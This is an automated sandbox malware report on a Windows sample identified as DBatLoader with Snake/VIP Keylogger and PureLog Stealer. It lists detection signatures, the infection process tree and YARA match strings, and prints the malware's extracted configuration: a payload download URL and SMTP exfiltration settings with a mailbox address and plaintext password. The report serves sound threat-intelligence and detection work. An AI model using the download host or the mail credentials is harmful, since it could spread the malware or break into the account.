Edit tour

Windows Analysis Report
yxU3AgeVTi.exe

Overview

General Information

Sample name:	yxU3AgeVTi.exe renamed because original name is a hash value
Original sample name:	6047499517804f1ea76b508ca469de99.exe
Analysis ID:	1584678
MD5:	6047499517804f1ea76b508ca469de99
SHA1:	ba5e8a683c8b8b54a14984d86715040d00777f11
SHA256:	03b17e6fe6ce874c0cf78b2e560f5fb4106e07ce33799632b2e1bbf24e9fb371
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files with a suspicious file extension

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

yxU3AgeVTi.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\yxU3AgeVTi.exe" MD5: 6047499517804F1EA76B508CA469DE99)

cmd.exe (PID: 4296 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 340 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Aiymwhpj.PIF (PID: 1704 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)

cmd.exe (PID: 6740 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 6800 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Aiymwhpj.PIF (PID: 2500 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)

cmd.exe (PID: 5716 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 3808 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4109204899.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000001.1805725850.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000003.00000002.4109204899.0000000000C20000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000007.00000002.4109202248.0000000000B90000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.4109307157.0000000000B90000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1709607679.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3eae2:$a1: get_encryptedPassword 0x3eab6:$a2: get_encryptedUsername 0x3eb7a:$a3: get_timePasswordChanged 0x3ea92:$a4: get_passwordField 0x3eaf8:$a5: set_encryptedPassword 0x3e8c5:$a7: get_logins 0x39f12:$a10: KeyLoggerEventArgs 0x39ee1:$a11: KeyLoggerEventArgsEventHandler 0x3e999:$a13: _encryptedPassword
00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f6f2:$a1: get_encryptedPassword 0x3f6c6:$a2: get_encryptedUsername 0x3f78a:$a3: get_timePasswordChanged 0x3f6a2:$a4: get_passwordField 0x3f708:$a5: set_encryptedPassword 0x3f4d5:$a7: get_logins 0x3ab22:$a10: KeyLoggerEventArgs 0x3aaf1:$a11: KeyLoggerEventArgsEventHandler 0x3f5a9:$a13: _encryptedPassword
00000003.00000001.1687216190.0000000000C20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
0000000C.00000001.1881316189.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
0000000C.00000002.4109307157.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3b1b2:$a1: get_encryptedPassword 0x3b186:$a2: get_encryptedUsername 0x3b24a:$a3: get_timePasswordChanged 0x3b162:$a4: get_passwordField 0x3b1c8:$a5: set_encryptedPassword 0x3af95:$a7: get_logins 0x365e2:$a10: KeyLoggerEventArgs 0x365b1:$a11: KeyLoggerEventArgsEventHandler 0x3b069:$a13: _encryptedPassword
00000000.00000002.1688698049.0000000002286000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000002.4109202248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
